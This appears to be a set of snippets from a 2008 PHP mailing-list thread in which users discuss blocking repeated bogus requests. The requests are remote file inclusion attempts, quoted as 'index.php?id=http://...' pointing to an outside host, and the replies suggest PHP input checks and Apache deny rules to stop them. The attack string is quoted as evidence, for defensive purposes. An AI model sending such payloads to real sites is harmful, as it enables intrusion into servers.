Chris wrote:
> I'm sure there would be a way to do it with ModRewrite or something
> but it's 5 lines of code in php so I'd do it there *shrug*.
See my reply to Arno - in Apache it's only 2 lines of config. :-)
/Per Jessen, Zürich
--
PHP General Mailing List (http://www.php.net/)
To unsubscri
Hi Arno
No, when you use it's not filesystem specific any more. But I've
just found out that you can't match on the query-string.
> These images aren't on my server, and
> the requests aren't trying to access images on my server. What I see
> are requests using the php script on my server to tr
On Thursday 24 July 2008 09:38:57 Chris wrote:
> Børge Holen wrote:
> > On Thursday 24 July 2008 09:14:55 Chris wrote:
> >>> I was hoping there's a way to tell apache to block requests where
> >>> id=non_numeric.
> >>
> >> It's trying to do a remote inclusion.
> >>
> >> It's easy for you to fix in
> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.
It's trying to do a remote inclusion.
It's easy for you to fix in php:
if (isset($_GET['id'])) {
if (!is_numeric($_GET['id'])) {
die("Die hacker die!");
}
}
I'm sure there woul
> Thanks, I'm already doing something like that, but I want to stop it getting
> to php.
http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html
Ask on an apache list how to use it.
--
Postgresql & php tutorials
http://www.designmagick.com/
--
PHP General Mailing List (http://www.php.net/)
To u
Børge Holen wrote:
> On Thursday 24 July 2008 09:14:55 Chris wrote:
>>> I was hoping there's a way to tell apache to block requests where
>>> id=non_numeric.
>> It's trying to do a remote inclusion.
>>
>> It's easy for you to fix in php:
>>
>> if (isset($_GET['id'])) {
>> if (!is_numeric($_GET
> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.
It's trying to do a remote inclusion.
It's easy for you to fix in php:
if (isset($_GET['id'])) {
if (!is_numeric($_GET['id'])) {
die("Die hacker die!");
}
}
I'm sure there woul
> Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?
2 x yes. I think you could probably use and ban all access
with "Deny from all".
/Per Jessen, Zürich
--
Thanks for replying Per. Isn't "Deny from all" mor
On Thursday 24 July 2008 09:14:55 Chris wrote:
> > I was hoping there's a way to tell apache to block requests where
> > id=non_numeric.
>
> It's trying to do a remote inclusion.
>
> It's easy for you to fix in php:
>
> if (isset($_GET['id'])) {
> if (!is_numeric($_GET['id'])) {
>
> I'm getting a lot of bogus requsts in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?";, sometimes more
> than a hundred a day per domain. The php script catches it, logs the
> request, sends an email report and replies with "access denied", but
> it takes processing which
Arno Kuhl wrote:
I'm getting a lot of bogus requsts in the form of
"index.php?id=http://64.15.67.17/~babysona/logo.jpg?";, sometimes more than a
hundred a day per domain. The php script catches it, logs the request, sends
an email report and replies with "access denied", but it takes processing
w
Arno Kuhl wrote:
> Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?
2 x yes. I think you could probably use and ban all
access with "Deny from all".
/Per Jessen, Zürich
--
PHP General Mailing List (http:
I'm getting a lot of bogus requsts in the form of
"index.php?id=http://64.15.67.17/~babysona/logo.jpg?";, sometimes more than a
hundred a day per domain. The php script catches it, logs the request, sends
an email report and replies with "access denied", but it takes processing
which I'd rather not
13 matches
Mail list logo
